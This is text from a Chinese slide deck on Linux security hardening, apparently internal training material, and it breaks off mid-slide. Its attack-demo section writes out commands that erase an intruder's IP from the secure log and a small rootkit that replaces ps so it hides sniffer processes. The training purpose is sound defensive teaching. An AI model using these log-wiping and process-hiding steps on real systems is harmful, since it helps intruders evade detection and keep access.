腾讯内部培训资料_Linux操作系统安全配置.pptVIP

Linux操作系统安全配置 安全中心－信息安全 Coolcyang 2005.3 内容提要 Who Why What How 总结 Who 本培训针对的人群 维护主机的管理员 想加强自身team/部门主机安全的管理者 网络安全技术有兴趣的同事 Why 管 理 技 术 Why（技术层面） 安 全 的 脆 弱 点 Why（技术层面） Why（技术层面） 常见的黑客手段 Why（技术层面） Why（技术层面） 问题一 10分钟用您的智慧挑战黑客 您听说或知晓的黑客攻击手段？ 黑客拿到服务器权限会有哪些危害？ 针对这些攻击您是否有好的解决方案？ 按攻击方法分类 远程获得权限攻击 本地超越权限攻击 拒绝服务攻击 远程获得最高权限 远程获得普通访问权 本地权限非正常提升 入 侵 行 为 分 类 Why（技术层面） 攻击手法和入侵者技术趋势 高 低 1980 1985 1990 1995 2000 密码猜测 可自动复制的代码 密码破解 利用已知的漏洞 破坏审计系统 后门 回话劫持 擦除痕迹 嗅探 包欺骗 GUI远程控制 自动探测扫描 拒绝服务 www 攻击(注入,垮站脚本) 工具 攻击者 入侵者 技术 攻击手法 半开放隐蔽扫描 控制台入侵 检测网络管理 DDOS 攻击 Why（技术层面） 发掘阶段 拓展阶段 映射阶段 勘查阶段 Why（技术层面） Why（技术层面） Why（技术层面） 一次渗透攻击的演示 Why（技术层面） 踩点 Why（技术层面） 扫描 Why（技术层面） 攻击 清 除 日 志 [root@victim log]#grep –v the. hack. ip.from secure secure.tmp [root@ victim log]#mv secure.tmp secure [root@ victim log]#chmod 700 secure Why（技术层面） 隐藏后门一个简单的rootkit :PS 1、mv ps psbak 2、cat ps #!/bin/sh psbak $1|grep -v sniff|grep -v grep|grep -v psbak|gawk {gsub(/sh \/bin\//, ,$0);print}‘ [ctrl+d] 3、chmod 755 ps Why（技术层面） 扩大战果 使用john破解软件 使用Sniff类监听器捕获敏感数据 安装Dos软件攻击其他主机 利用此服务器的信任关系进行内网攻击 释放蠕虫和病毒 Why（技术层面） 最小安装、关闭非要服务 访问控制和审计 保持最新的安全更新 屏蔽敏感信息 Why（技术层面） 踩点 隐藏后门 攻击 扫描 扩大战果 清除日志 Why（管理层面） 风险不是独立存在的 攻击有蔓延性 单一的安全手段不能保护系统的安全 木桶理论 木桶理论 What（技术层面） 安全补丁更新 敏感信息保护 最小化安全原则 访问控制 防DOS配置 完整性检验 日志维护和保护 What（技术层面） 安全补丁更新 Kernel更新 升级避免Kernel内核漏洞 Slackware自带包更新 http://slackware.it/en/pb/ Slackware更新补丁的命令 What（技术层面） 安全补丁更新 敏感信息保护 最小化安全原则 访问控制 防DOS配置 完整性检验 日志维护和保护 What（技术层面） 敏感信息保护 屏蔽banner信息版本信息 删除默认帐户 删除默认目录 What（技术层面） 安全补丁更新 敏感信息保护 最小化安全原则 访问控制 防DOS配置 完整性检验 日志维护和保护 What（技术层面） 最小化安全原则 关闭不必要的服务包 包最小化 安全母盘 安装系统时使用专家模式自行定制 Pkgtools进行包管理 不安装X相关的软件 不安装GAME软件 不安装不使用的开发工具 服务最小化 安装时采取白名单仅安装需要套件 通过netstat －anp检查开放端口进行验证 端口扫描，并根据公司高危端口相关规定检测 通过绑定内网屏蔽外部风险 通过IPTABLES进行包过滤设置 What（技术层面） 安全补丁更新 敏感信息保护 最小化安全原则 访问控制 防DOS配置 完整性检验 日志维护和保护 What（技术层面） 访问控制 chmod SetuidSetgid umask chattr What（技术层面） 访问控制 Chmod 禁止其他人对root可能运行的脚本有写权限。 SetuidSetgid 去除所有不必要的S位程序。 Umask 最小化权限回收 Chattr Chattr设置隐蔽的访问控制规则 What（技术层面） 安全补丁更新 敏感信息保护 最小化安全原则 访问控制 防DOS配置 完整性检验 日志维